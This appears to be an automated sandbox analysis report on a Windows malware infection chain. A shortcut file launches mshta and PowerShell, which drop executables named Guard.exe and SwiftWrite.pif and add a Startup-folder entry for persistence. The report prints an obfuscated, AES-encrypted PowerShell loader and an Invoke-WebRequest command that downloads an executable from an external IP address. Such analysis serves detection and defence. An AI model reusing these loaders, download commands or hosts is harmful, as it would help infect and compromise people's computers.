Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Guard.exeSection loaded: version.dll
Source: C:\Users\Public\Guard.exeSection loaded: winmm.dll
Source: C:\Users\Public\Guard.exeSection loaded: mpr.dll
Source: C:\Users\Public\Guard.exeSection loaded: wininet.dll
Source: C:\Users\Public\Guard.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: userenv.dll
Source: C:\Users\Public\Guard.exeSection loaded: uxtheme.dll
Source: C:\Users\Public\Guard.exeSection loaded: kernel.appcore.dll
Source: C:\Users\Public\Guard.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Guard.exeSection loaded: wldp.dll
Source: C:\Users\Public\Guard.exeSection loaded: napinsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: pnrpnsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wshbth.dll
Source: C:\Users\Public\Guard.exeSection loaded: nlaapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Guard.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: winrnr.dll
Source: C:\Users\Public\Guard.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: twext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: version.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: R8CAg00Db8.lnkLNK file: ..\..\..\..\Windows\System32\forfiles.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: dvdplay.pdbGCTL source: mshta.exe, 00000003.00000003.1948118831.000002BB7FD94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947163594.000002BB7FD73000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1956099299.000002BB7FD66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948118831.000002BB7FD7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1957335691.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947191712.000002BB7FD61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1965120480.000002B37DBA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966337969.000002B37DB7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948710988.000002BB7FCFB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948672661.000002BB7FCEC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1957090898.000002B37DB7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966912942.000002BB7FD69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948749602.000002B37DB7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947779722.000002BB7FCE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948749602.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966416203.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947094973.000002BB7FD94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1965728895.000002B305580000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dvdplay.pdb source: mshta.exe, 00000003.00000003.1947163594.000002BB7FD73000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1956099299.000002BB7FD66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1957335691.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947191712.000002BB7FD61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1965120480.000002B37DBA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948710988.000002BB7FCFB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948672661.000002BB7FCEC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966912942.000002BB7FD69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947779722.000002BB7FCE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948749602.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1965728895.000002B305580000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($vuOOVEuV){return -split ($vuOOVEuV -replace '..', '0x$& ')};$ernnEW = clean('4C4392ECE516D550361614F1B8641852253A5A9044A308574B9B1D67D2AA2493F763385A53C21C962D73AF7A3A1A7644FEF103968D9CE4BE22CDCF4C9AAAA0D1156C1042714327D0DF9559DCEF92D952D1FED7FD44F342E94970DDD5132E30A64E35E4751324A276E21D098222A9D80B841DC7508B47242C8DE36693A37A446E45337CE1895E882872A68C1B8DC77B41FAE1F5DE0A8934D3A20E197DA6F27C6B095CECC866561B5408D27B35AD836E83E5CFCA3209303BBA973A0E0D9CD3E9998D23C90BFE13CC4BEFAE3250CE0200F86C96B61BB66F12DDB70731B13C3A28A955F482A02B32FF9A15DA1ECFBBBF793CC72EDB34A5A987FF46C0D61D6E31A789B13290EB3AD9E662512ADC0281C570BCCF12079609337C2B50C6FF3BD620E71911E95424327F329EB0DC1C6F5355D6B9A0C38A95701B7EFFFD3792E6A3BF2C09DFC231E806D1546112A4E3CA8C984F0E37455D4A9B1BF07168B9D0A2AA9CFED23A36201580A871CA7A00A0FF1092079C043208CA9D5FB2B2CD7B9D78A4DB3176B4A187FC2B0A69302794F7EF5CF7B38EA290D6A3FD0FED4D1A7CFA6F9F2ABEB4968B37732EBE6F7B5D433925FCC54BCF9F0751476C4A1F7381FCAB8207125C23DF8455AB2E13D85EB368A1619B06BF2DA9EAAD111EFB8AEEDDEFD41D80A23271E7E72E7A5905A7C4F3CF522315763C528146A5D8861258033777A0C5EBD195000561C965AA4AC7B18EAD7327CE25B8624E927D2D5D7FDDC36C21B9772937ED991F17813F0F3A8422D3AF278FAD8A504D97390558B4C0E09B3F0AFAEB83FF0ED68659D2D0133F372F5CCA602FCFC65D5B169F7EFD754CC9B688D5590926DABC2E7CF00A4B3C64F8492DDBC72D696028CEA4EF1497C9951F051DD47FBA7AA633AE4216D74BB6544091543B7A4C88AA7D7449070259AA42EF74061F08CAEB6D24698FD62B73C9B854EF540BE2BC1197A260BC8EFAC5EB1F66809412345727AAA19E00AA6AB2B0AE4E8E2214D612DCF3CC187893D8E4EFA843640E5F762AF24639A3DA6573BCBFAAD965B1008B1DA5762FE0C1DEE2B3BC73609EABEB3867D7830D8FF386594BAC138E1F2B5BF3E19010CCEB41ED303E01E3AC4371CCB141E9B798EC90619F0930690897751682C457CE95E208E0D89FCFA0C3A2F215F55C4AFA67942C7969C7EC45757A3F2B843201BA5896CE084ECF029902929420A5A605DCAE06D0E20817E54A84154B910E2A7E99DCE88C63234F53567ECD466A94DB5A936652CFB9B2A1733BB00337D0AD339944F80BA2AFFF40DFE5A067255BCBBA6FDD8FDF8857B0D56E86B756F7C329B1C464F95203B87123A10F7826ED9D32686CD372031EB990E0F919E47B5551BDA69E3DE02837FD75820E2A01F6A7D0AC1F71A9F7457ADE2919759EEA4F517ADD7A983D85B4AB3F976B6B347C72A9F8CE4E17746B79C374BCF7DA567F5D6193036C3A9147BFBF55BD54659FD8DD5702914E8D495DF4376BC0D1E4380DFAEDE844E819363C215834E1E687ABC854482303E7F2A9138B86EA3385D31DA2D6CFAF1C47A1284645A362744A4C2705A1D4B9163FD1BFB07A0A75F1E0DB2117DE25DEDCE3420754D43D6D88BC61EAB468CDACE4EBC10E259AF12DED9C8A0C34E0A2EFB4BD9481FBB751CAA484B894364EA30FC61BF09678F49094CAE7B13B5DC645845DAD9D5663D049F75C8C5C48BD68780101A2414A8D606C6B1B06274EC46254D163CDB2BE295BC7899CDCFF4B92A1A447ACF4B39C8E69');$oZcBKP = [System.Security.Cryptography.Aes]::Create();$oZcBKP.Key = clean('614A73516F706C757242416C6E617351');$oZcBKP.IV = New-Object byte[] 16;$nFAfpwETU = $oZcBKP.CreateDecryptor();$jftLKJake = [Text.Encoding]::UTF8.GetString($nFAfpwETU.TransformFinalBlock($
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($vuOOVEuV){return -split ($vuOOVEuV -replace '..', '0x$& ')};$ernnEW = clean('4C4392ECE516D550361614F1B8641852253A5A9044A308574B9B1D67D2AA2493F763385A53C21C962D73AF7A3A1A7644FEF103968D9CE4BE22CDCF4C9AAAA0D1156C1042714327D0DF9559DCEF92D952D1FED7FD44F342E94970DDD5132E30A64E35E4751324A276E21D098222A9D80B841DC7508B47242C8DE36693A37A446E45337CE1895E882872A68C1B8DC77B41FAE1F5DE0A8934D3A20E197DA6F27C6B095CECC866561B5408D27B35AD836E83E5CFCA3209303BBA973A0E0D9CD3E9998D23C90BFE13CC4BEFAE3250CE0200F86C96B61BB66F12DDB70731B13C3A28A955F482A02B32FF9A15DA1ECFBBBF793CC72EDB34A5A987FF46C0D61D6E31A789B13290EB3AD9E662512ADC0281C570BCCF12079609337C2B50C6FF3BD620E71911E95424327F329EB0DC1C6F5355D6B9A0C38A95701B7EFFFD3792E6A3BF2C09DFC231E806D1546112A4E3CA8C984F0E37455D4A9B1BF07168B9D0A2AA9CFED23A36201580A871CA7A00A0FF1092079C043208CA9D5FB2B2CD7B9D78A4DB3176B4A187FC2B0A69302794F7EF5CF7B38EA290D6A3FD0FED4D1A7CFA6F9F2ABEB4968B37732EBE6F7B5D433925FCC54BCF9F0751476C4A1F7381FCAB8207125C23DF8455AB2E13D85EB368A1619B06BF2DA9EAAD111EFB8AEEDDEFD41D80A23271E7E72E7A5905A7C4F3CF522315763C528146A5D8861258033777A0C5EBD195000561C965AA4AC7B18EAD7327CE25B8624E927D2D5D7FDDC36C21B9772937ED991F17813F0F3A8422D3AF278FAD8A504D97390558B4C0E09B3F0AFAEB83FF0ED68659D2D0133F372F5CCA602FCFC65D5B169F7EFD754CC9B688D5590926DABC2E7CF00A4B3C64F8492DDBC72D696028CEA4EF1497C9951F051DD47FBA7AA633AE4216D74BB6544091543B7A4C88AA7D7449070259AA42EF74061F08CAEB6D24698FD62B73C9B854EF540BE2BC1197A260BC8EFAC5EB1F66809412345727AAA19E00AA6AB2B0AE4E8E2214D612DCF3CC187893D8E4EFA843640E5F762AF24639A3DA6573BCBFAAD965B1008B1DA5762FE0C1DEE2B3BC73609EABEB3867D7830D8FF386594BAC138E1F2B5BF3E19010CCEB41ED303E01E3AC4371CCB141E9B798EC90619F0930690897751682C457CE95E208E0D89FCFA0C3A2F215F55C4AFA67942C7969C7EC45757A3F2B843201BA5896CE084ECF029902929420A5A605DCAE06D0E20817E54A84154B910E2A7E99DCE88C63234F53567ECD466A94DB5A936652CFB9B2A1733BB00337D0AD339944F80BA2AFFF40DFE5A067255BCBBA6FDD8FDF8857B0D56E86B756F7C329B1C464F95203B87123A10F7826ED9D32686CD372031EB990E0F919E47B5551BDA69E3DE02837FD75820E2A01F6A7D0AC1F71A9F7457ADE2919759EEA4F517ADD7A983D85B4AB3F976B6B347C72A9F8CE4E17746B79C374BCF7DA567F5D6193036C3A9147BFBF55BD54659FD8DD5702914E8D495DF4376BC0D1E4380DFAEDE844E819363C215834E1E687ABC854482303E7F2A9138B86EA3385D31DA2D6CFAF1C47A1284645A362744A4C2705A1D4B9163FD1BFB07A0A75F1E0DB2117DE25DEDCE3420754D43D6D88BC61EAB468CDACE4EBC10E259AF12DED9C8A0C34E0A2EFB4BD9481FBB751CAA484B894364EA30FC61BF09678F49094CAE7B13B5DC645845DAD9D5663D049F75C8C5C48BD68780101A2414A8D606C6B1B06274EC46254D163CDB2BE295BC7899CDCFF4B92A1A447ACF4B39C8E69');$oZcBKP = [System.Security.Cryptography.Aes]::Create();$oZcBKP.Key = clean('614A73516F706C757242416C6E617351');$oZcBKP.IV = New-Object byte[] 16;$nFAfpwETU = $oZcBKP.CreateDecryptor();$jftLKJake = [Text.Encoding]::UTF8.GetString($nFAfpwETU.TransformFinalBlock($Jump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F907634 LoadLibraryA,GetProcAddress,10_2_00007FF79F907634
Source: ghep1[1].3.drStatic PE information: real checksum: 0x5f0d should be: 0x2286a
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9AA81621 pushad ; ret 5_2_00007FFD9AA81629
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8A78FD push rdi; ret 10_2_00007FF79F8A7904
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8A7399 push rdi; ret 10_2_00007FF79F8A73A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9A9B0B9A push eax; retf 18_2_00007FFD9A9B0D4D
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EDE93F push edi; ret 20_2_00EDE941
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EDEA58 push esi; ret 20_2_00EDEA5A
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F18A4A push FFFFFF8Bh; iretd 20_2_00F18A4C
Source: C:\Users\Public\Guard.exeCode function: 20_2_00ED8B75 push ecx; ret 20_2_00ED8B88
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EDEC33 push esi; ret 20_2_00EDEC35
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EDED1C push edi; ret 20_2_00EDED1E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009EE93F push edi; ret 24_2_009EE941
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009EEA58 push esi; ret 24_2_009EEA5A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A28A4A push FFFFFF8Bh; iretd 24_2_00A28A4C
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009E8B75 push ecx; ret 24_2_009E8B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009EEC33 push esi; ret 24_2_009EEC35
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009EED1C push edi; ret 24_2_009EED1E

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
Drops PE files with a suspicious file extension
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ghep1[1]Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\PefjSkkhb.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ghep1[1]Jump to dropped file

Boot Survival

barindex
Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F894514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00007FF79F894514
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F359B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,20_2_00F359B3
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EC5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,20_2_00EC5EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A459B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,24_2_00A459B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009D5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,24_2_009D5EDA
